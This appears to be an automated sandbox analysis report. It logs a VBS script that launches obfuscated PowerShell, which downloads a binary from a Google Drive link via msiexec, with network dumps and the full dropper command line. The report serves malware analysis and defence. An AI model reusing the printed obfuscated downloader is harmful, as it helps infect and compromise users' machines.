                                2024-09-30 08:02:54 UTC1390INData Raw: 67 72 47 52 4b 48 48 79 4d 38 30 79 32 74 77 2f 53 4b 67 4a 64 54 4f 78 50 54 32 35 33 67 4d 73 58 62 35 34 76 4b 68 4a 6b 4b 45 78 78 71 6e 4e 6f 58 36 65 6b 37 6b 4c 75 6d 65 56 33 48 6c 53 7a 70 39 2b 6f 30 4e 49 4c 55 42 41 41 6f 64 6a 53 70 64 65 6a 4a 77 6e 6c 4f 39 34 4d 44 49 71 59 4d 42 75 43 52 56 33 47 71 5a 6a 75 46 67 62 37 32 47 50 2b 35 31 43 34 42 6b 4f 66 47 4d 64 63 52 6a 66 42 68 6f 36 56 6d 6d 56 4e 43 31 39 31 6a 6d 65 47 5a 56 57 35 33 69 2b 62 64 7a 62 64 62 7a 71 51 33 65 6c 76 66 53 58 36 47 6b 68 78 75 6a 54 67 41 6a 72 58 52 31 35 5a 70 30 58 4a 62 71 71 4c 58 73 66 36 36 2f 51 6b 67 4d 65 55 50 6a 46 4c 58 73 4e 72 33 32 2b 35 6c 54 76 65 66 41 31 36 6b 2f 41 4c 77 71 49 4e 38 45 78 64 55 5a 39 32 70 5a 42 76 34 75 2b 5a 39 6b
                                Data Ascii: grGRKHHyM80y2tw/SKgJdTOxPT253gMsXb54vKhJkKExxqnNoX6ek7kLumeV3HlSzp9+o0NILUBAAodjSpdejJwnlO94MDIqYMBuCRV3GqZjuFgb72GP+51C4BkOfGMdcRjfBho6VmmVNC191jmeGZVW53i+bdzbdbzqQ3elvfSX6GkhxujTgAjrXR15Zp0XJbqqLXsf66/QkgMeUPjFLXsNr32+5lTvefA16k/ALwqIN8ExdUZ92pZBv4u+Z9k


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.449738142.250.185.206443416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                2024-09-30 08:03:32 UTC216OUTGET /uc?export=download&id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.google.com
                                Cache-Control: no-cache
                                2024-09-30 08:03:32 UTC1610INHTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 30 Sep 2024 08:03:32 GMT
                                Location: https://drive.usercontent.google.com/download?id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy&export=download
                                Strict-Transport-Security: max-age=31536000
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Cross-Origin-Opener-Policy: same-origin
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Content-Security-Policy: script-src 'nonce-eWseaf3MyVANxBMEj4wmFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.449739142.250.184.193443416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                2024-09-30 08:03:33 UTC258OUTGET /download?id=1OhT-yOF4bkZNovQ0kzaZfhJv1MXwb5Yy&export=download HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Cache-Control: no-cache
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
                                2024-09-30 08:03:36 UTC4857INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Content-Security-Policy: sandbox
                                Content-Security-Policy: default-src 'none'
                                Content-Security-Policy: frame-ancestors 'none'
                                X-Content-Security-Policy: sandbox
                                Cross-Origin-Opener-Policy: same-origin
                                Cross-Origin-Embedder-Policy: require-corp
                                Cross-Origin-Resource-Policy: same-site
                                X-Content-Type-Options: nosniff
                                Content-Disposition: attachment; filename="iOvNTpfgMcg40.bin"
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: false
                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                Accept-Ranges: bytes
                                Content-Length: 106560
                                Last-Modified: Mon, 30 Sep 2024 02:00:00 GMT
                                X-GUploader-UploadID: AD-8ljt9b1FTRGtdM5UQGTd34ek1itLiOpJpg3kPQzwS0DwsBInilL_zHb7aYrTAKVYM_SjEqiTZoZv0lQ
                                Date: Mon, 30 Sep 2024 08:03:35 GMT
                                Expires: Mon, 30 Sep 2024 08:03:35 GMT
                                Cache-Control: private, max-age=0
                                X-Goog-Hash: crc32c=deOd8w==
                                Server: UploadServer
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close
                                2024-09-30 08:03:36 UTC4857INData Raw: 4a ba b9 01 c9 40 38 87 41 f0 16 58 bd 2f 68 3d c4 07 3f b4 c9 bf 2e e1 08 3e fb db 4f 82 38 ba 07 d8 16 51 25 08 ec 7e f0 b1 64 5e c2 5a ac 79 6e 99 ec b3 58 0e 49 c1 f5 93 26 a5 04 b9 c2 d9 fc f5 e7 1a 46 b6 c8 cb f5 0d 5e ec e2 33 21 fd 0a 9c 48 3a 86 6c 7a 65 cf 7b f1 df b2 b5 45 91 56 25 4f 76 d6 e0 69 67 45 aa 18 44 0b 08 f0 13 7f ff 65 54 a3 d4 34 74 0d 22 64 00 7e b3 5a b5 8f 08 33 d3 9d e8 a6 4c 89 35 33 f5 19 69 91 4a d1 eb c5 12 6e d8 f2 bd e7 9f 05 e8 be 39 82 c6 e9 75 a5 14 15 e1 a0 96 c4 ea a9 ae 1c ec e1 06 72 ae b1 32 77 1e bc 07 be e0 7b 89 6e 37 38 38 d7 53 3d 73 43 8a 71 2c fb ee be 3d 83 92 15 53 da 2b 85 75 b2 b9 71 7b db 3f 35 7a f8 ee 8d c4 ec 63 17 b6 0f 42 db 50 b3 ad d8 f0 17 6f c9 b1 f2 a8 f5 08 8c 6d 53 57 eb 3c 12 0b c8 28 39
                                Data Ascii: J@8AX/h=?.>O8Q%~d^ZynXI&F^3!H:lze{EV%OvigEDeT4t"d~Z3L53iJn9ur2w{n788S=sCq,=S+uq{?5zcBPomSW<(9
                                2024-09-30 08:03:36 UTC4857INData Raw: e8 2c 2d 8b fb 57 5f 1f 0e f9 5f 3a fe 43 ef 8d ee 7a e8 96 ff cf af 28 9e 82 ab ba 6c 1d 57 55 ac 52 cf 1e ea 39 88 60 8a 52 6d f3 eb be a0 a1 01 6e a7 56 82 40 20 1f da 64 b5 7d bd 3f 37 a5 e5 85 bb fa e1 5c 47 e2 2b 94 7e 1a 83 7b 20 38 55 6b 11 67 2e 79 af 65 a9 c4 b7 5e 14 17 f7 52 f8 0e af 35 a0 57 34 cd 3b 40 38 bd 0c f5 2a 59 28 ea cd 4d 40 dc 67 f7 84 9f ab 37 e6 d2 d2 ee 7a 4e 79 44 64 85 31 11 87 e8 bb 95 5f 87 1a ca 0f d1 d8 66 67 9d 18 0e 6c d4 5d 8d 43 75 e6 f1 87 db 37 47 71 c0 a5 7a 53 49 51 e8 e4 85 02 ab 7a e1 49 fb 43 00 0d 3f 55 7a 99 8d 8d e2 d1 4b 69 55 4e db 66 48 d6 0b 3d 16 f7 ff a2 88 03 8f b5 89 59 02 01 b8 11 90 5b f0 99 50 37 ea 49 24 a8 6e 33 f2 1c 4e c1 b8 2f 59 a2 c3 ec ef fc f8 2e b0 32 3a 0e 1b 83 7b 3f 37 49 e6 6c c0 89
                                Data Ascii: ,-W__:Cz(lWUR9`RmnV@ d}?7\G+~{ 8Ukg.ye^R5W4;@8*Y(M@g7zNyDd1_fgl]Cu7GqzSIQzIC?UzKiUNfH=Y[P7I$n3N/Y.2:{?7Il
                                2024-09-30 08:03:36 UTC129INData Raw: 75 41 29 a5 0c 4a be 03 0e 1c 0e fb 60 9c 52 70 05 d7 41 de 05 3b 46 c9 9a 9e c7 63 03 7b d1 71 ff 3a f2 a0 ae 89 ea 1f 8e 7e 1c 61 06 6d 02 84 74 06 f6 9d 16 81 81 1a 6c 70 80 0b 95 fc bf 9b 83 f4 cf cc 5c 6e b3 c0 5b b4 43 d9 36 de e7 52 62 87 8a 40 25 0f 66 38 c8 70 95 f9 34 87 d8 ae 5a ff 9d b5 5d e2 36 b7 c0 1f 25 f0 5e de 60 a1 1d df c6 00 87 7d 0b 0f ed 46 8e 3d 47 37 8c 13 bb
                                Data Ascii: uA)J`RpA;Fc{q:~amtlp\n[C6Rb@%f8p4Z]6%^`}F=G7
                                2024-09-30 08:03:36 UTC1321INData Raw: 39 00 cc f8 2b d1 ae 57 7b 51 05 09 ab af 26 ac 5d 10 5a 4d 54 68 8b c8 8f 29 7a 57 24 62 c5 0b 97 62 8e 96 99 9b bd 3f 72 25 d1 7f 52 d7 8b 1a a2 32 4d ef 26 03 ba 28 46 e8 54 54 2f 3b 4d 11 75 78 d5 6e f1 e4 c4 2d 1b 9f fd 41 1f 78 d7 ac 95 86 63 48 0b 4e e1 46 b1 1f 9e 63 82 84 b6 1f b9 06 05 b2 8e 8a f5 5e 32 c0 af 87 14 18 96 25 c3 be d3 5c 19 d0 f6 3b 10 d4 8f 5d 90 fe a5 09 8d 7a 2b 95 61 5c c0 68 5c a8 8a 53 8a 0c 37 68 66 ea fa 7d 9d 1e 6c 9f bb 31 5a f8 8a 36 dd 42 9c e6 b3 d6 35 10 45 7e 78 c1 16 c2 6e 2c 71 30 c3 0c 86 4f 7e 61 b3 7d 19 ba 68 2b 4f bb 8e 65 7e 23 47 c6 5d 44 73 05 7c 5d e8 d8 0f 71 03 1f d7 e4 b0 1a 3d cf 5e a6 55 13 57 17 53 02 e5 ab 5c a3 c5 e6 de 6e 99 f7 00 30 27 14 f9 66 2f 59 9e 6d 69 be ac fa 0f 30 d1 6e fc 90 e1 4d e9
                                Data Ascii: 9+W{Q&]ZMTh)zW$bb?r%R2M&(FTT/;Muxn-AxcHNFc^2%\;]z+a\h\S7hf}l1Z6B5E~xn,q0O~a}h+Oe~#G]Ds|]q=^UWS\n0'f/Ymi0nM
                                2024-09-30 08:03:36 UTC1390INData Raw: bc 83 3d 88 c0 2e 15 22 f8 4c 2f 6f 54 ff d7 d5 de bf 2e 83 7d b0 3f b6 cb 52 a5 31 dd a0 10 5c e0 d2 b5 85 4f f4 fe 4b eb 7e 9a b5 d6 83 c2 74 53 e4 5b 5f 19 64 a6 94 66 59 91 62 0a fd 52 e5 59 6b 7a 7f 78 f6 d1 28 96 c3 9c 57 0c 6e 4b aa 88 df 9a 39 3e 42 b7 fa 64 18 90 c2 32 d7 4a 69 b0 c7 9d 16 81 81 cb 60 5b 84 03 c3 fd db 10 49 3a 46 53 9c 9d 90 ab b0 30 62 27 e3 37 d9 cf 87 36 62 43 ab de 71 e3 85 88 c4 32 21 70 ce f9 86 46 68 c0 fa 68 a4 cd 75 67 9f 0e 13 ce 62 9f e0 70 a5 8a d5 96 54 c5 1d 46 52 4e f3 6a 13 d7 77 02 2a c1 56 09 8b b9 15 80 46 9e 08 21 a8 80 80 2a b6 37 b3 d2 85 47 c8 ad 82 fa 62 e2 fa df df bb f3 fa af 8d c7 bd 9a d1 46 7e df f0 ea c2 29 e1 50 07 c4 82 5e 79 2b b9 0e 5c 8d 03 c8 87 4c fc d8 f7 62 b2 80 89 44 6f 67 74 07 1c 73 d7
                                Data Ascii: =."L/oT.}?R1\OK~tS[_dfYbRYkzx(WnK9>Bd2Ji`[I:FS0b'76bCq2!pFhhugbpTFRNjw*VF!*7GbF~)P^y+\LbDogts
                                2024-09-30 08:03:36 UTC1390INData Raw: b7 29 c4 06 10 0c 2e cb a8 43 d8 77 02 44 33 ba f7 b1 3e cc 82 c2 6f a2 38 ed c4 2f b1 19 f9 27 70 fa 08 b3 97 38 6a a6 91 25 ae 1b e4 09 66 62 0f 61 c4 f9 fa 22 ae b9 ba 6e 78 b0 c8 23 22 0e 31 f7 8a 97 a4 7a 37 70 5f 0e b6 53 60 2d e7 a5 b2 7f aa 11 47 5c 64 a6 68 74 8b 06 de 1a c0 43 d9 2c e9 39 49 ff 46 cc 76 f9 01 a0 0d 2c fc c7 2e 1b 98 70 42 27 b2 82 79 47 d7 bd 8e 80 95 39 b1 b5 41 76 4b 6c ce a8 2b 3c 13 95 dd c3 a9 30 5f 52 57 0a 98 29 0f b9 b3 ea 62 f4 d8 97 cc 17 2a be e3 db 53 12 93 a1 fd d8 b8 2d 57 a0 16 e8 80 dd a3 88 99 40 78 fa 0f 77 0b 4f 34 ca 5d 0d de 6a 5b a2 1c b7 0d e9 9a c0 8c ed fb bd 95 05 26 76 31 d0 29 c7 88 aa e8 64 30 26 eb 5d 2f 9e 43 0b d8 4b 5d f9 52 35 30 ea 36 12 d9 a8 78 d5 71 91 45 fd 25 a5 df d8 c8 f8 2e 1b ae e8 28
                                Data Ascii: ).CwD3>o8/'p8j%fba"nx#"1z7p_S`-G\dhtC,9IFv,.pB'yG9AvKl+<0_RW)b*S-W@xwO4]j[&v1)d0&]/CK]R506xqE%.(
                                2024-09-30 08:03:36 UTC1390INData Raw: 9b 15 cb f9 e2 eb bd 48 de 32 38 b4 df 9b 8d 07 44 40 42 19 bf f3 14 85 b1 a3 e0 ed 4d 54 9a d0 be d3 8a 63 46 f7 2b 83 2d 5c 89 98 e1 8c a6 c1 22 92 70 65 fe 4e ff 86 17 7b 35 b2 41 1d 74 e4 87 23 f2 46 cd 13 04 a6 e9 cd 8f 3b e3 37 93 a4 e2 42 ab 8b 71 0d 5c fc a6 91 24 ed 6f 28 47 e6 ee ff 6c 7c cd 07 ea 05 66 23 e9 b7 36 6d 07 54 ca 1e cf 8b 22 58 54 59 44 db 2b 29 5a 3b db a7 c8 e6 e7 9d d0 ac 23 1f 2d f5 30 84 ec e0 b6 14 fc 4a ac 10 39 76 18 c5 b2 da db 16 36 f7 0f f5 f1 06 44 08 6b e4 ea a9 01 21 19 30 40 8a 1d fe fa 20 9e a0 f1 85 bc 27 2c e7 25 e3 3e 6a 06 7f 4a 9b 76 60 48 18 70 64 92 d4 fd f2 aa 4d 68 aa 4e 95 ff d5 10 a8 b7 16 c0 55 6e 20 6f 0d 0f e4 83 4d 44 72 d2 ea 20 9b 95 bd d4 a7 f7 50 dc 3f d6 bc 90 df 85 b3 1e 32 c3 85 bf f0 52 f3 30
                                Data Ascii: H28D@BMTcF+-\"peN{5At#F;7Bq\$o(Gl|f#6mT"XTYD+)Z;#-0J9v6Dk!0@ ',%>jJv`HpdMhNUn oMDr P?2R0
                                2024-09-30 08:03:36 UTC1390INData Raw: 5a f2 e1 84 3a fc 4c 8c e4 cd 3d b6 4c f6 4d f2 40 f9 ab d7 bf e9 03 bb 52 b2 4a 80 d4 69 f4 48 53 44 03 aa fd de ba 69 65 5a d1 29 bd cf 27 f6 37 19 75 1f c6 42 7d 35 46 e1 fc 3d c1 63 08 63 91 d1 f6 8f 03 f2 a7 d7 9f 3f 38 83 c8 8f 56 24 13 2f c7 b1 ec 98 a5 63 dd 25 af a3 cb 64 cf a3 34 ba ef ad 0f a0 5d 93 3c cd 9f e7 9f 3c 72 7a 38 2b 54 63 cb 1a b6 dc 70 8b 8d b3 32 b2 11 aa e3 12 2a a6 2b af 66 8a e6 e3 03 28 ce 03 5d f5 52 0f 1d 89 0e 30 8f ba 33 0f c1 da 13 5b ed 09 d9 a2 80 a9 ab e6 8d e4 fe 5f bd 52 1d cb e6 f1 b9 d8 a2 39 fe 20 94 d2 06 90 a7 76 99 a6 80 5d a7 28 78 f1 82 e4 bd c0 35 92 b5 92 47 ff a0 03 17 89 29 9f 59 d6 4f 6c 6e 23 a7 86 53 24 2f a0 f5 da c8 a1 86 eb bc 3a d2 cc 82 da 0e a8 3b 45 53 2a 65 98 8c cd ac 27 58 d9 14 03 3f 23 3c
                                Data Ascii: Z:L=LM@RJiHSDieZ)'7uB}5F=cc?8V$/c%d4]<<rz8+Tcp2*+f(]R03[_R9 v](x5G)YOln#S$/:;ES*e'X?#<
                                2024-09-30 08:03:36 UTC1390INData Raw: fc 80 ee 4d 82 7c dd 0b 32 79 b6 f7 f5 a2 9d b5 7a 49 1e 35 9f 6b 62 85 7f 90 25 ed 63 67 17 12 0a 3b 2a 1a 1f b9 bf 22 9f 13 4d 42 ea e9 8c df 77 ce a1 b0 21 4e 0b 92 5c 23 99 af c6 c3 0e f1 f7 9d cf 52 49 8f e4 4a cb 4e ac ee 36 4c 15 a1 c9 51 c7 d7 55 65 15 43 44 2c 21 c5 ce 96 4b 20 be 18 5f 73 59 ae 0a d8 20 5f 27 60 f2 e1 50 16 14 50 40 f3 39 2a 8d e4 4d 56 08 61 f9 df cb 2b 70 04 30 94 81 15 89 67 4c cc ea 6f 9a cd be 43 53 16 68 4d 58 ba e3 5c 9d cf fa 8a 6f cf 18 e3 ad b4 a8 c4 e2 76 ca bd 77 49 25 04 55 9e 6e 10 21 5a 80 77 b6 b2 4f c1 11 2c c6 06 b5 c4 62 11 c7 fe 63 63 82 21 6a c3 c9 aa 8b af 0d 9b b7 04 09 0a e7 00 b9 12 6c 9f d6 36 62 2f 7d 61 29 98 c6 ac b6 80 e4 f9 bb bf ba 6c 27 e2 12 85 1e 92 bb 64 8a bf 45 93 dc eb 5f 0b 54 e2 5a 49 85
                                Data Ascii: M|2yzI5kb%cg;*"MBw!N\#RIJN6LQUeCD,!K _sY _'`PP@9*MVa+p0gLoCShMX\ovwI%Un!ZwO,bcc!jl6b/}a)l'dE_TZI
                                2024-09-30 08:03:36 UTC1390INData Raw: 95 cf d0 a5 ae ce d7 dc 1c aa d8 41 44 14 39 93 56 9d 18 83 4e cb 50 2e f7 da 4f 4c 90 5b d0 66 45 5d cc 08 f6 74 91 c8 bb fc 17 1b 85 82 4f 9e 67 81 73 c1 d5 9c 06 31 86 50 5b ff 10 53 7e e9 ee 93 7c 19 be d8 f6 e2 9b 69 61 4e 48 13 0f ab 3d 7e eb 93 2b de f9 3f df 9f 1f fc e3 cf 02 91 ad 3f 6a e8 91 2d 99 09 6a ee 4c fc 81 ee 1e 5d 83 22 0d 0a 89 6b e5 5a 1b 9e b1 41 19 22 d9 38 25 bc 7a 0b 6e 01 39 a3 44 33 c0 5d 5f d6 eb a7 14 34 29 88 ac 8c 37 a1 53 ac df 03 7c bb ef 8f e4 72 31 de 42 85 09 ea af 6c 2d 4d 10 c4 f9 16 18 2e 3f d7 43 65 be 60 27 01 56 bf eb b8 aa 16 d5 47 39 ce 4c ce 4f ab 65 69 d3 bb d4 4d 64 f0 89 0a 52 57 73 02 35 48 ee 50 12 02 50 3e f7 1d 93 82 14 9b d7 ee 40 f9 ab cf ab 2b 89 6d 7c e4 90 d1 70 1d ee 4a ce 22 48 06 95 95 0f 64 ce
                                Data Ascii: AD9VNP.OL[fE]tOgs1P[S~|iaNH=~+??j-jL]"kZA"8%zn9D3]_4)7S|r1Bl-M.?Ce`'VG9LOeiMdRWs5HPP>@+m|pJ"Hd


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:04:02:43
                                Start date:30/09/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs"
                                Imagebase:0x7ff6c6810000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:1
                                Start time:04:02:46
                                Start date:30/09/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHande:Hvid i Um,dDAircoEAndvaOunderGFloppEPallbnAffejO Met UModulSL.ngw=DrikknPassaEHyperwSygel- OuncoTeglsb ,oguJP,ddeeSi icC odfuTSamme HistoSDr,geYUn elSStanitSte.seDav dmS ipj. DugpnElutrePoultTBilet.Ei htw He lEinchwb V,edcBedraLFiskeIArbejEMiljbNForskTHavre ');Iba ($Brnevold);Iba (Burnets254 'Jaege$Brugei BlsedUgeskeWeakeo tunng For eStvdrnProgroRadiuuJoyf sFster.CountH PinoeForziaOc,ondOpholeS ibsr Wa.nsLokal[ Ande$.viboRExteno StylsKarrykStyrgiAllerlResp.dUnchueNonre1Pukke9Bromi0P ten] Nonp= n nt$SynodAKri eaGigsfrSphaceBl sdnF,rbrdPandeeK,ritsD,kim ');$Stryges88=Burnets254 'Mowss$Miljtibre.fdC ckneSavelo R megBesagePu arnTacitoAutoruInexps Mand. to,aD OffeoDo.erwExtranSubmulTriamoDefeaaLiveddMiljbF CoeliVestelLa yve Seig(Bisul$Ri.hsHTelefy arebePatrit TurdoSystegD lprrMiliea rystpTigerhEspio,,tart$ ref PHastir TeddoFe.itxSkreseforl,n rbejeEuroetBervi) Sen ';$Proxenet=$Cylinderer;Iba (Burnets254 'Sodav$RecidGSpiflL S emOMlke.BT turaStroslRecir:AbstaA OverBFuddlYTuggeEbe ludPreha=Depor(TudseTBevgeEDispls,hototL tes-Badebp BeleAAdju tB topHJomfr Kvkk$ thypHero,R HaemOLavenX U reETimetNCoinseExcurt,atro)Filmn ');while (!$Abyed) {Iba (Burnets254 'Tangf$Pres.gPouchlGo,ifoPacifbProctaLumbrlMedia:DecalPRemicofunb,sForuriObovatC sariC.lluvEksisiChlo.sSlovetforeteArchinMarat=,emat$ ArmotTubberNonbiu RobieAot a ') ;Iba $Stryges88;Iba (Burnets254 ',adanSCollit Ariza AnelrSkruet Selv- KlbeS ndelHemateAndroeFri zpBukke Recr.4partr ');Iba (Burnets254 'Am.er$Gingeg U.gllBrddeoGarsibDisenaKonfolBogbr:Be.fiA DigibTittiyPrepaeEnd sdGenea=Pry,l(RosewT Phote abylsPhilotRdhov-BotanPVagtfa hirotDeli hI dst Downt$ uperPHemmerProp.oRevacxInstreBehann Ele.e SolatForhe)G ave ') ;Iba (Burnets254 'E,poi$OphavgUnheslDelkaoYokonbPerboa Oc.olSlem.:MikroRRollobCongrdT knoiGold.gHamatePilgrrPit ie fort= p us$TriumgFuglelpe ecoFofarbUndisa U,drlDefla:PuddlCBefolyfin,esSurtatZidaloI.dbls Mis.pAlarmaMbelfs apsom ,lou+Melod+folke% Cz.r$UnthiS P,ricSolarrBas.saAntndwLikablSwervsTaeni.Farvec eproFringuRegdnn Paratforl ') ;$Hyetograph=$Scrawls[$Rbdigere];}$Bemandingers=312136;$Baksningens=32559;Iba (Burnets254 'Brief$Aalekg rogrl FremoLaconb Embuatnde l Mill: MillKOffeniEncrimBenz ewoollrSuperiSi,ped evisg SnoriSkossa lokhnkaosj Fe.b=Tilk ChadaGKolo eTrskrtStbef-interCN umdoKnortnFo.tst,trigeHanken Unsat lith Bo il$Disp,PSaesorSneenoRe oixDayfleDisrunKetokeMaaletS,lla ');Iba (Burnets254 ' Skul$Rull.gFarvelUnu.toAuxocbV.redaKnsobl life:BouzoPMgt.grCentroHa ild Tan,uJunkikSporottypehu ForudForu v BesriRoyalkTilsjlRepute tarerDete.eSheetsSvige Shang=Auk i Repl[DuettSSno,byTllins rmout onteeOutpumHaveb. ryskCUdlgsoKamutndispovregreeMatchrEnsnatAlca ]Sudan:Slave:EjendFstaldr Incro estmLutetB utreaPenros UndeeCar,t6Pneum4 ljeS eptatPhymarEk.triBrevsn Pol,gSkvis(Ultim$StoreKTorskiNintum ilepe BalarD.triiBortrd SyrugSysteivizieaRensknBe be)Daudk ');Iba 